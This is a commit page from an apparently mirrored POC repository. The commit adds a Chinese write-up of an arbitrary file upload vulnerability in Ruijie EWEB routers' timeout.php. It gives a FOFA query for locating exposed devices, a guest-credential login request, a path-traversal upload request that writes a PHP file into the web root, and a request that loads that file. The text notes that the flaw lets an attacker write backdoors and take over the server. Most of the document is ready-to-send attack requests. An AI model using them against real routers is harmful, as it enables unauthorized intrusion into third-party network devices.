admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 锐捷EWEB路由器timeout.php任意文件上传漏洞.md

Browse Source
This commit is contained in:
Rainyseason 2025-03-24 09:51:19 +08:00 committed by GitHub
parent 0474f983f6
commit 698ce12541
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 55 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
wpoc/锐捷/锐捷路由器/锐捷EWEB路由器timeout.php任意文件上传漏洞.md
View File

@ -1 +1,56 @@
# 锐捷 EWEB路由器 timeout.php任意文件上传漏洞
# 一、漏洞简介
锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞攻击者可以任意执行服务器端的代码编写后门获得服务器权限进而控制整个web服务器。
# 二、影响版本
+ 锐捷 EWEB路由器
# 三、资产测绘
+ fofa`title=”锐捷网络-EWEB网管系统"`
+ 特征
![1709883604157-a88eaed0-f449-414c-86ab-4951422896ee.png](./img/jMJPLGwCvErQjGMK/1709883604157-a88eaed0-f449-414c-86ab-4951422896ee-226270.png)
# 四、漏洞复现
获取cookie
```plain
POST /ddi/server/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Content-Length: 30
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
username=guest&password=guest?
```
上传
```plain
POST /system_pi/timeout.php?a=upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 62
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=dumk6rq561ie9udafp5eod39t7; path=/; HttpOnly; RUIJIEID=dumk6rq561ie9udafp5eod39t7
X-Requested-With: XMLHttpRequest
Connection: keep-alive
fileName=../tmp/html/233.php&mes=<?php echo 23149147841;?>
```
访问上传结果
```plain
GET /233.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: keep-alive
Cookie: RUIJIEID=dumk6rq561ie9udafp5eod39t7
Accept-Encoding: gzip, deflate, br
```